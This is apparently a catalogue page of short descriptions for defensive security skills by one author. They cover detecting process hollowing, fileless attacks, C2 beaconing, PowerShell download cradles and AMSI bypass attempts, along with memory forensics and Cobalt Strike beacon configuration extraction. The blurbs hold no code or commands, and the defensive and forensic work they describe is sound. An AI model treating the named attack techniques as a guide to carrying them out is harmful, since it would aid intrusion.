by mukul975
analyzing-ransomware-network-indicators helps analyze Zeek conn.log and NetFlow to spot C2 beaconing, TOR exits, exfiltration, and suspicious DNS for Security Audit and incident response.
by mukul975
extracting-memory-artifacts-with-rekall guide for analyzing Windows memory images with Rekall. Learn install and usage patterns to find hidden processes, injected code, suspicious VADs, loaded DLLs, and network activity for Digital Forensics.
by mukul975
detecting-process-hollowing-technique helps hunt process hollowing (T1055.012) in Windows telemetry by correlating suspended launches, memory tampering, parent-child anomalies, and API evidence. Built for threat hunters, detection engineers, and responders who need a practical detecting-process-hollowing-technique for Threat Hunting workflow.
by mukul975
detecting-fileless-attacks-on-endpoints helps build detections for memory-only attacks on Windows endpoints, including PowerShell abuse, WMI persistence, reflective loading, and process injection. Use it for Security Audit, threat hunting, and detection engineering with Sysmon, AMSI, and PowerShell logging.
by mukul975
The analyzing-windows-amcache-artifacts skill parses Windows Amcache.hve data to recover evidence of program execution, installed software, device activity, and driver loading for DFIR and security audit workflows. It uses AmcacheParser and regipy-based guidance to support artifact extraction, SHA-1 correlation, and timeline review.
by mukul975
analyzing-powershell-script-block-logging skill for parsing Windows PowerShell Script Block Logging Event ID 4104 from EVTX files, reconstructing split script blocks, and flagging obfuscated commands, encoded payloads, Invoke-Expression abuse, download cradles, and AMSI bypass attempts for Security Audit work.
by mukul975
analyzing-network-traffic-of-malware helps inspect PCAPs and telemetry from sandbox runs or incident response to find C2, exfiltration, payload downloads, DNS tunneling, and detection ideas. It is a practical analyzing-network-traffic-of-malware guide for Security Audit and malware triage.
by mukul975
analyzing-malicious-url-with-urlscan helps analysts triage suspicious links with URLScan.io, inspect redirects, screenshots, DOM content, and network calls, and turn results into IOCs and a clear security decision. Use this guide for phishing response, URL analysis, and Security Audit workflows.
by mukul975
analyzing-heap-spray-exploitation helps analyze heap spray exploitation in memory dumps with Volatility3. It identifies NOP sled patterns, suspicious large allocations, shellcode landing zones, and process VAD evidence for Security Audit, malware triage, and exploit validation.
by mukul975
analyzing-cobalt-strike-beacon-configuration helps extract and analyze Cobalt Strike beacon configuration from PE files, shellcode, and memory dumps to identify C2 infrastructure, sleep/jitter, user-agent, watermark, and malleable profile details for Security Audit, threat hunting, and incident response.
